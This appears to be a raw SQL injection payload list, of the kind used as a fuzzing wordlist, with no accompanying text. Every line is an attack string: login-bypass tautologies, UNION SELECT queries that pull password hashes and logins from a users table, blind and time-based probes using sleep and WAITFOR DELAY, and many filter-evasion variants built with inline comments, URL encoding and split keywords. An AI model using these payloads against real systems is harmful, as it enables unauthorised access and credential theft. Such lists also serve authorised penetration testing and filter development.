' OR '1
" or ""*"
' or true--
admin' --
admin" or 1=1--
admin") or ("1"="1"/*
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1' GROUP BY 1,2,--+
1' ORDER BY 3--+
' GROUP BY columnnames having 1=1 --
1+union+select+1,2,3/*
1+un/**/ion+sel/**/ect+1,2,3--
1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
/*!50000%75%6e%69on*/ %73%65%6cect 1
%2c(select%20*%20from%20(select(sleep(10)))a)
/*!12345UnioN*//**/(/*!12345seLECT*//**/1)
/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)
@a:=(/*!50000concat(database/**_**/(),"--","_Y000!_")*/)
-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+
-1+UNION+SELECT+1+INTO+@,@
1+UnIoN/**/SeLecT/**/1,2,3--
1+UNunionION+SEselectLECT+1,2,3--
-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4
(1)un/**/ion(sel/**/ect(1),mid(hash,1,32)from(users))
1+unio/**/n+(s/**/elect'1',concat(login,hash)from+users)
,(se/**/le/**/ct * from (sele/**/ct(sleep(10)))a)
%2c(s/**/elec/**/t%20*%20from%20(se/**/lect(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --